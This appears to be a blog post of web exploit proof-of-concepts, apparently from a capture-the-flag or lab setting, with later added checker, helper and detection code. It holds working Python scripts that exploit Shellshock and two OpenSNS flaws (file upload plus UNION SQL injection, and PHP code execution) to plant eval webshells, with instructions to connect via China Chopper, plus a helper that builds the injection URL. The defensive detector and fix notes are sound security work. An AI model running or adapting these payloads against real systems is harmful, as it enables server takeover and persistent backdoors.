PoCs for some websites

Author: ifqu | Source: published 2018-06-13 10:57, read 0 times

PoC for the bash vulnerability (Shellshock, CVE-2014-6271)

import requests
# target CGI script: the CGI gateway exports request headers as environment
# variables (HTTP_USER_AGENT etc.), which is exactly what the bash bug needs
url='http://10.4.0.12/cgi-bin/duweihy123.cgi'
# a bash function definition followed by a command; the command writes a
# one-line PHP webshell (password c) into the nginx web root
headers={"User-Agent":"() { :;}; echo `/bin/echo '<?php @eval($_POST[\"c\"]);?>' > /usr/local/nginx/html/duwei321.php`"}
# for apache the web root is usually /var/www/html
response=requests.get(url,headers=headers)
print(response.text)

Connect with China Chopper (菜刀); the one-line webshell's password is c and its path is http://xxx/duwei321.php.
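Before dropping a webshell as the PoC above does, a practitioner normally confirms the bug without touching the target's filesystem. The following is an added example, not the original post's code: it injects only an `echo` of a random marker, tries several header names (because a CGI gateway exports them as HTTP_* environment variables), and reports which one came back. `fake_cgi` and `patched_cgi` are constructed stand-ins for a vulnerable and a fixed server so the example runs offline; the header list and the target URL are assumptions, and `requests_sender` is the wrapper you would pass for live use.

```python
"""Non-destructive Shellshock (CVE-2014-6271) check (added example)."""
import secrets
import subprocess
from typing import Callable, Dict, Optional

# Header names a CGI gateway typically exports to the environment
# (HTTP_USER_AGENT, HTTP_REFERER, HTTP_COOKIE). Assumed list; extend it
# with whatever the target forwards.
VECTORS = ("User-Agent", "Referer", "Cookie")

Sender = Callable[[str, Dict[str, str]], str]


def shellshock_header(command: str) -> str:
    """Bash function definition followed by the command to smuggle in.

    The leading `echo;` emits the blank line that terminates the CGI header
    block; without it the server answers 500 and the command's output never
    reaches the client, which is a common reason a live target looks patched.
    """
    return "() { :;}; echo; " + command


def probe_headers(vector: str, marker: str) -> Dict[str, str]:
    """Headers for one probe: the marker is merely echoed, nothing is written."""
    return {vector: shellshock_header("echo " + marker)}


def is_vulnerable(body: str, marker: str) -> bool:
    """The marker can only appear in the body if the shell ran our command."""
    return marker in body


def check_url(url: str, sender: Sender) -> Optional[str]:
    """Return the first header vector through which the marker came back, or None."""
    marker = "shk" + secrets.token_hex(8)
    for vector in VECTORS:
        if is_vulnerable(sender(url, probe_headers(vector, marker)), marker):
            return vector
    return None


def requests_sender(url: str, headers: Dict[str, str]) -> str:
    """Real sender for live use (imported lazily so the example runs without requests)."""
    import requests
    return requests.get(url, headers=headers, timeout=10).text


def fake_cgi(url: str, headers: Dict[str, str]) -> str:
    """Constructed stand-in for an unpatched host: like vulnerable bash it runs
    whatever follows the function body. Only User-Agent is 'exported' here,
    so Referer and Cookie probes come back clean."""
    value = headers.get("User-Agent", "")
    prefix = "() { :;};"
    if not value.startswith(prefix):
        return "<html>ok</html>"
    trailing = value[len(prefix):]
    return subprocess.run(trailing, shell=True, capture_output=True, text=True).stdout


def patched_cgi(url: str, headers: Dict[str, str]) -> str:
    """Constructed stand-in for a fixed host: header values are never executed."""
    return "<html>ok</html>"


if __name__ == "__main__":
    target = "http://10.4.0.12/cgi-bin/duweihy123.cgi"   # assumed, from the PoC
    print(check_url(target, fake_cgi))      # User-Agent
    print(check_url(target, patched_cgi))   # None
```

Against a real host call `check_url(target, requests_sender)`; a returned vector name tells you which header to carry the real payload in.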
PoC for the OpenSNS website

# -*- coding:utf-8 -*-
# OpenSNS chain: register a throwaway account, log in, upload a PHP file
# through the share endpoint, then use a UNION injection on the profile
# page to read back where the newest .php upload was saved.

import requests
import random
import re
import os

s = requests.Session()
url = 'http://10.2.0.112/'     #!!! change this to the target

def getRandomName():
    # four random lowercase letters, used as nickname and e-mail local part
    name = ''
    for i in range(4):
        name += chr(random.randint(97, 122))
    return name

def register():
    registerUrl = url + 'index.php?s=/ucenter/member/register.html'
    nickname = getRandomName()

    headers = {
        'Referer': registerUrl,
        'Content-Type': 'application/x-www-form-urlencoded',
    }
    data = {
        'role': '1',
        'username': nickname+'@test.com',
        'nickname': nickname,
        'password': '123456',
        'reg_type': 'email',
    }
    r = s.post(registerUrl, data=data, headers=headers)

    return nickname

def login(username):
    loginUrl = url + 'index.php?s=/ucenter/member/login.html'

    headers = {
        'Referer': loginUrl,
        'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
        #'X-Requested-With': 'XMLHttpRequest',
    }
    data = {
        'username': username,
        'password': '123456',
        'remember': '0',
        'from': loginUrl,
    }
    r = s.post(loginUrl, data=data, headers=headers)
    #print(r.text)

def upload():
    uploadUrl = url + 'index.php?s=/weibo/share/doSendShare.html'
    # the 'query' field names the handler (app=Home, model=File, method=upload)
    # that stores the attachment, and the .php extension is kept;
    # open in binary mode so the file is sent byte for byte
    file = {'file_img': open('/Users/fuqi/Desktop/small.php', 'rb')}     #!!! change this to your webshell
    data = {
        'content': '123',
        'query': 'app=Home&model=File&method=upload&id=',
    }
    r = s.post(uploadUrl, data=data, files=file)
    #print(r.text)

def getShell():
    # UNION injection in the uid path segment; 0x252e706870 is '%.php' as a
    # MySQL hex literal (no quotes needed), so the newest uploaded .php row is
    # selected and savepath+savename is reflected in the third column
    exp = url + 'index.php?s=/ucenter/index/information/uid/23333 union (select 1,2,concat(savepath,savename),4 from ocenter_file where savename like 0x252e706870 order by id desc limit 0,1)#.html'
    r = s.get(exp)
    pattern=re.compile(r'<attr title=.*?>(.*?)</attr>')
    item=re.findall(pattern, r.text)
    print(item)

def main():
    username = register()
    login(username)
    upload()
    getShell()

if __name__ == '__main__':
    main()
    os.system("pause")   # Windows only: keeps the console window open

Connect with China Chopper; the script prints the path of the uploaded shell.
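The getShell() step above packs three tricks into one URL. As an added example (not the original post's code), the helpers below show why the PoC spells the LIKE pattern as the hex literal 0x252e706870 (a quote-free encoding of '%.php' that survives quote-escaping input filters), how the UNION payload is assembled so the file path lands in the column the page renders, how the path is pulled out of the `<attr title=...>` element, and how it maps to a URL. The table and column names (ocenter_file, savepath, savename) and the regex are the PoC's; the sample response fragment and the assumption that savepath is relative to the web root are mine.

```python
"""Helpers for the OpenSNS upload + UNION-injection chain (added example)."""
import re
from urllib.parse import urljoin

ATTR_RE = re.compile(r"<attr title=.*?>(.*?)</attr>")   # same pattern as the PoC


def like_hex(pattern: str) -> str:
    """MySQL hex literal for a string: no quote characters, so it passes
    addslashes-style filters that would mangle '%.php'."""
    return "0x" + pattern.encode("utf-8").hex()


def hex_decode(literal: str) -> str:
    """Inverse of like_hex, handy when reading someone else's payload."""
    return bytes.fromhex(literal[2:]).decode("utf-8")


def union_payload(columns: int, expr: str, position: int, table: str, where: str) -> str:
    """UNION SELECT with `expr` in 1-based column `position`; the other columns
    are numeric placeholders, which is also how one finds the echoed column."""
    cols = [str(i) for i in range(1, columns + 1)]
    cols[position - 1] = expr
    return (f"union (select {','.join(cols)} from {table} "
            f"where {where} order by id desc limit 0,1)#")


def getshell_url(base: str, uid: int = 23333) -> str:
    """Reproduce the PoC's getShell() URL: the newest .php row of ocenter_file,
    with savepath+savename shown in column 3 of the profile page."""
    where = f"savename like {like_hex('%.php')}"
    inj = union_payload(4, "concat(savepath,savename)", 3, "ocenter_file", where)
    return f"{base}index.php?s=/ucenter/index/information/uid/{uid} {inj}.html"


def extract_shell_path(html: str):
    """First <attr> value that looks like a PHP file, or None."""
    for value in ATTR_RE.findall(html):
        if value.lower().endswith(".php"):
            return value
    return None


def shell_url(base: str, savepath_plus_name: str) -> str:
    """Turn './Uploads/.../x.php' into http://host/Uploads/.../x.php. Assumes
    savepath is relative to the document root; adjust if the site is not
    served from the directory that holds Uploads/."""
    if savepath_plus_name.startswith("./"):
        rel = savepath_plus_name[2:]
    else:
        rel = savepath_plus_name.lstrip("/")
    return urljoin(base, rel)


# Constructed response fragment, shaped like the profile page the injection is
# reflected into; the file name is made up.
SAMPLE_HTML = (
    '<div class="info"><attr title="">2</attr>'
    '<attr title="./Uploads/Picture/2018-06-13/5b20b5a1c3f2d.php">'
    './Uploads/Picture/2018-06-13/5b20b5a1c3f2d.php</attr></div>'
)

if __name__ == "__main__":
    base = "http://10.2.0.112/"   # assumed, from the PoC
    print(getshell_url(base))
    path = extract_shell_path(SAMPLE_HTML)
    print(path, "->", shell_url(base, path))
```

On the defensive side the same URL shows the fix: the uid segment must be cast with intval() or bound as a parameter, because a numeric column in a path segment receives no quotes, which is why the injection needs none.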

PoC for another OpenSNS version

import requests
# the area page passes the areasite parameter to PHP code execution, so the
# value below writes a one-line webshell (password lac) into Uploads/
url='http://10.2.0.141/index.php?s=people/index/area.html'
data={
    'areamap':"/map/e",
    'areasite':"file_put_contents('/usr/share/nginx/open/Uploads/15.php','<?php eval($_POST[lac]);?>');"
}
response=requests.post(url,data=data)
print(response.status_code)

Connect with China Chopper; the password is lac and the file sits under the Uploads path.
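All three PoCs on this page leave a recognisable mark in the request itself. The following is an added example, not the original post's code, serving all three sections: it parses raw HTTP requests and flags a bash function definition "() {" in any header (Shellshock), a multipart part whose filename carries a PHP extension (the doSendShare upload), and a form field holding PHP source or a file-writing or eval-style call (the areasite parameter). The four sample requests are constructed for this example with the PoCs' hosts and endpoints; the extension list and keyword list are assumptions a real rule set would tune.

```python
"""Request-level detection for the three PoCs on this page (added example)."""
import re
from urllib.parse import parse_qs, urlencode

SHELLSHOCK_RE = re.compile(r"\(\)\s*\{")
PHP_UPLOAD_RE = re.compile(r'filename="[^"]*\.(?:php\d?|phtml|phar)"', re.IGNORECASE)
PHP_CODE_RE = re.compile(
    r"<\?php|\b(?:eval|assert|system|passthru|file_put_contents)\s*\(", re.IGNORECASE)


def parse_request(raw: str):
    """Split a raw request into (method, target, headers, body); header names lowercased."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers, body


def detect(raw: str):
    """Return the list of findings for one request; an empty list means clean."""
    _method, _target, headers, body = parse_request(raw)
    findings = []
    for name, value in headers.items():            # Shellshock can ride any exported header
        if SHELLSHOCK_RE.search(value):
            findings.append(f"shellshock:{name}")
    ctype = headers.get("content-type", "")
    if ctype.startswith("multipart/form-data") and PHP_UPLOAD_RE.search(body):
        findings.append("php-upload")
    if ctype.startswith("application/x-www-form-urlencoded"):
        for field, values in parse_qs(body).items():   # decodes %xx and '+' first
            if any(PHP_CODE_RE.search(v) for v in values):
                findings.append(f"php-code:{field}")
    return findings


def _req(method, target, headers, body=""):
    """Assemble a raw request text (used only to build the constructed samples)."""
    lines = [f"{method} {target} HTTP/1.1"] + [f"{k}: {v}" for k, v in headers.items()]
    return "\r\n".join(lines) + "\r\n\r\n" + body


BOUNDARY = "----ExampleBoundary"
UPLOAD_BODY = (
    f"--{BOUNDARY}\r\nContent-Disposition: form-data; name=\"content\"\r\n\r\n123\r\n"
    f"--{BOUNDARY}\r\nContent-Disposition: form-data; name=\"file_img\"; filename=\"small.php\"\r\n"
    "Content-Type: application/octet-stream\r\n\r\n<?php @eval($_POST[\"c\"]); ?>\r\n"
    f"--{BOUNDARY}--\r\n"
)

# Constructed samples: three matching the PoCs above plus one benign request.
SAMPLES = {
    "shellshock": _req("GET", "/cgi-bin/duweihy123.cgi",
                       {"Host": "10.4.0.12", "User-Agent": "() { :;}; echo; /usr/bin/id"}),
    "upload": _req("POST", "/index.php?s=/weibo/share/doSendShare.html",
                   {"Host": "10.2.0.112",
                    "Content-Type": f"multipart/form-data; boundary={BOUNDARY}"},
                   UPLOAD_BODY),
    "eval": _req("POST", "/index.php?s=people/index/area.html",
                 {"Host": "10.2.0.141",
                  "Content-Type": "application/x-www-form-urlencoded"},
                 urlencode({"areamap": "/map/e",
                            "areasite": "file_put_contents('/usr/share/nginx/open/Uploads/15.php',"
                                        "'<?php eval($_POST[lac]);?>');"})),
    "benign": _req("POST", "/index.php?s=people/index/area.html",
                   {"Host": "10.2.0.141",
                    "User-Agent": "Mozilla/5.0 (X11; Linux x86_64)",
                    "Content-Type": "application/x-www-form-urlencoded"},
                   urlencode({"areamap": "/map/e", "areasite": "Beijing"})),
}


def scan_all():
    """Run detect() over every sample; returns {name: findings}."""
    return {name: detect(raw) for name, raw in SAMPLES.items()}


if __name__ == "__main__":
    for name, hits in scan_all().items():
        print(f"{name:10s} {hits}")
```

The form-field rule only works because the body is percent-decoded before matching; a rule applied to the raw body would miss `%3C%3Fphp`. The upload rule keys on the declared filename, so it should be paired with a server-side allowlist of extensions, which is the actual fix for the doSendShare step.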


Article link: https://www.haomeiwen.com/subject/ndfjeftx.html